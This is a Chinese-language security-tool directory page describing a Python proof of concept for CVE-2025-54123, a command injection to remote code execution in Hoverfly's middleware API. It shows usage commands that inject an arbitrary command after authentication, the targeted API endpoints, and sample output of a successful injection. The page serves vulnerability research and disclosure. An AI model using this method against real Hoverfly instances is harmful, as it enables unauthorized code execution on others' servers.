Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-54123 — 针对CVE-2025-54123的Python概念验证,演示了在Hoverfly中间件API中通过凭证或基于令牌的身份验证实现命令注入到远程代码执行(RCE)。 | Kitploit
工具/GitHubGitHub/0xk4rth1/cve-2025-54123
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制学习与教育
GitHub0xk4rth1/cve-2025-54123

CVE-2025-54123

针对CVE-2025-54123的Python概念验证,演示了在Hoverfly中间件API中通过凭证或基于令牌的身份验证实现命令注入到远程代码执行(RCE)。

查看仓库
232个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-54123 Hoverfly 命令注入到 RCE PoC

概述

该仓库包含一个用于与受 CVE-2025-54123 影响的 Hoverfly 实例进行交互的 Python 概念验证(PoC)脚本。

脚本支持:

  • 使用用户名/密码凭证进行身份验证
  • 使用现有的 Bearer 令牌进行身份验证
  • 与 Hoverfly 中间件 API 端点进行交互
  • 显示 API 响应输出

警告

本项目仅用于经授权的安全研究、测试和教育目的。未经明确许可,请勿将其用于任何系统。


依赖

  • Python 3.8+
  • requests

安装依赖:

root@kitploit:~
pip install requests

使用

使用凭证进行身份验证

root@kitploit:~
python CVE-2025-54123.py \
  --target example.com \
  --port 8888 \
  -u admin \
  -p password \
  --cmd "id"

使用现有令牌进行身份验证

root@kitploit:~
python CVE-2025-54123.py \
  --target example.com \
  --port 8888 \
  --token <ACCESS_TOKEN> \
  --cmd "id"

参数


身份验证流程

当提供凭证时:

  1. 向以下地址发送 POST 请求:
root@kitploit:~
/api/token-auth
  1. 提取返回的令牌。
  2. 使用该令牌对后续请求进行身份验证。

API 端点

脚本通过经过身份验证的 PUT 请求与以下地址通信:

root@kitploit:~
/api/v2/hoverfly/middleware

输出示例

root@kitploit:~
Approaching target : example.com
Attempting login to http://example.com:8888/api/token-auth
Checking Credentials....
Login Successful!
Injected : id
uid=1000(user) gid=1000(user)

项目结构

root@kitploit:~
.
├── CVE-2025-54123.py
└── README.md

免责声明

本仓库仅用于教育、防御性安全及授权测试目的。作者不对因使用本软件而导致的任何误用、损害或法律后果承担任何责任。

下载工具
参数描述
--target目标域名或 IP 地址
--port目标服务端口
-uHoverfly 用户名
-pHoverfly 密码
--token现有的 Bearer 令牌
--cmd提供给中间件端点的命令字符串